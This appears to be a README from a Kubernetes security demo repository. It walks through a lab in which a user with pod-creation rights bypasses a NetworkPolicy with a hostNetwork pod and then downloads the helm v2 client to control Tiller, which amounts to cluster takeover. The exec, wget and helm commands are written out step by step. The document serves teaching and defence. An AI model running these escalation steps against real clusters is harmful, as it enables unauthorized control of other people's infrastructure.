Skip to content

Latest commit

 

History

History

privilege-escalation

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 
 
 

Privilege escalation

This scenario demonstrates the potential for privilege escalation and network policy bypass by a malicious insider or compromise of their credentials with the ability to create pods in a namespace leading to full cluster access.

Demo

asciicast

NOTE: This scenario will run container with root access, and it set for demo purposes only. We strongly recommend NOT RUNNING IT ON A LIVE CLUSTER

pre-requisites

Make sure your cluster is setup following the instructions here

Lets Hack it

Setup and install the RBAC and Network policy

  1. apply the network policy and RBAC rules
kubectl apply -f privilege-escalation/daemonset.yaml
  1. Test the access to the system
kubectl auth can-i --as [email protected] create pods -n kube-system
kubectl auth can-i --as [email protected] create pods -n default

Deploy sample pod to test the access

  1. Deploy a simple pod
kubectl --as [email protected] apply -f privilege-escalation/simplepod.yaml
  1. Get a shell in the pod:
kubectl --as [email protected] exec -it simplepod -- /bin/sh
  1. Attempt to reach tiller directly:
wget -qO - tiller-deploy.kube-system:44134
exit

Bypass NetworkPolicy

  1. Deploy a hostnetwork pod that bypasses network egress policy on the namespace.
kubectl --as [email protected] apply -f privilege-escalation/hostnetwork.yaml
  1. Exec in, download the helm client binary and run helm ls to show that it can control Tiller.
kubectl --as [email protected] exec -it hostnetwork -- /bin/sh
export PATH=/tmp:$PATH; cd /tmp; wget -qO helm.tar.gz https://get.helm.sh/helm-v2.16.1-linux-amd64.tar.gz; tar zxvf helm.tar.gz; chmod +x linux-amd64/helm; cp linux-amd64/helm .
export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134; helm version
exit

Cleanup

To cleanup run

kubectl delete -f privilege-escalation/